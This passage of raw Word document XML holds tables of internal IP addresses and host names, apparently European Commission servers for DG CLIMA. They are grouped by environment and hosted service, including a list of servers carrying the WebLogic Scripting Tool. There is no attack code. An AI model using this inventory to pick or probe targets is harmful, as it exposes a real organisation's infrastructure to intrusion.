            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="23E1DCDC" w14:textId="4F6CDF8B"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10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2AE2B5BF" w14:textId="1EC8AFD7"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wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="56632159" w14:textId="140E8481"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34033FAE" w14:textId="0BFE0196"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7BAEC2B6" w14:textId="2A8F9E3A"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EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="4AC960A8" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45B46C0D" w14:textId="2A8DDF87"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10.130.136.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="35A20531" w14:textId="1FC5175C"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wlstd01981.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="23ADF3CE" w14:textId="671DEBAD"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636EF8DB" w14:textId="01E74217"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334DCD4A" w14:textId="1FDF1199"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EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="3DEB01E6" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="719EDCFA" w14:textId="7BB4B6C8"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10.130.132.27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="769069C3" w14:textId="5ED51BE1" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>muss.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D36634A" w14:textId="309B5F14"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4A8BD4B1" w14:textId="539B6206"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716B56BA" w14:textId="0B0C5F44"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="2C4B5ADD" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="34BDBDC0" w14:textId="61E9966B"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10.130.133.35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6E253ACD" w14:textId="593C614F" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>fardia.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="254DB253" w14:textId="7C6DF6C0"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30BEEAB4" w14:textId="21A028E6"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273EB8FC" w14:textId="184DD0DB"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="5B434A93" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5BDD7B98" w14:textId="3F90D0CE"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10.130.131.119</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5ADB5407" w14:textId="31A73BCA"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wlstd03450.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B337A45" w14:textId="77AD7CC3"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70E667DB" w14:textId="55983083"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522B1EA4" w14:textId="4A89EC2E"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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="10F0A8CB" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4989E788" w14:textId="7B88383A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.134.65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A8430BC" w14:textId="33E20A06" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd03459.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4C4E7E74" w14:textId="01A752E3" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7A560007" w14:textId="0B23859E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="504C0F38" w14:textId="6CC9A5E2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005211B2" w:rsidRPr="001019D3" w14:paraId="6750D562" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="686AD662" w14:textId="3FDC0F8E" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.130.222</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="65AF645C" w14:textId="784D9625" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>tmstd00513.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="14AA19CE" w14:textId="5386084B" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="787" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5CACBB64" w14:textId="57F91304" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="699DD713" w14:textId="095B5E44" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="005211B2">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>MRV4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CE1D370" w14:textId="75FB92BE" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00F5296D" w:rsidP="00035CD7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="245" w:name="_Toc212654678"/>
      <w:bookmarkStart w:id="246" w:name="_Ref212827921"/>
      <w:bookmarkStart w:id="247" w:name="_Toc213253585"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00035CD7" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ervers that contain the WebLogic Scripting Tool </w:t>
      </w:r>
      <w:bookmarkEnd w:id="245"/>
      <w:r w:rsidR="00035CD7" w:rsidRPr="001019D3">
        <w:t>(wlst.sh)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1477"/>
        <w:gridCol w:w="2334"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1504"/>
        <w:gridCol w:w="2603"/>
      </w:tblGrid>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="781D7FFD" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45F8A9DF"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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F99AE0B"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FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B6DA9F"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DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02EE0512"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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00452809" w14:textId="77777777" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00845EFB">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="15790AA0" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3928CBCC" w14:textId="0497BC9B" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.179.158</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D1F11B2" w14:textId="328B17BA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03800.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5BF6C988" w14:textId="09073A6E" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="259E4797" w14:textId="7A9249FB" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="442D35E2" w14:textId="7E8FA8D7" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="673D4C3B" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5F9968B3" w14:textId="32853176" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.181.163</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1B528D4C" w14:textId="0C1033DA" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03823.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="49035029" w14:textId="32EEDDE8" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1F270D89" w14:textId="4478599A" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="383F160A" w14:textId="684D3691" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="57974BE4" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="35A26207" w14:textId="756BDCD2" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.142.217</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1334" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="31978448" w14:textId="0CA0172D" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd01904.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1CBA7A8D" w14:textId="16033F99" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38FC3622" w14:textId="6FF04561" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3EB5980F" w14:textId="75333941" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FGAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00035CD7" w:rsidRPr="001019D3" w14:paraId="41420D5A" w14:textId="77777777" w:rsidTr="002B3751">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="844" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="62475EDD" w14:textId="50CEFED7" w:rsidR="00035CD7" w:rsidRPr="001019D3" w:rsidRDefault="00035CD7" w:rsidP="00035CD7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
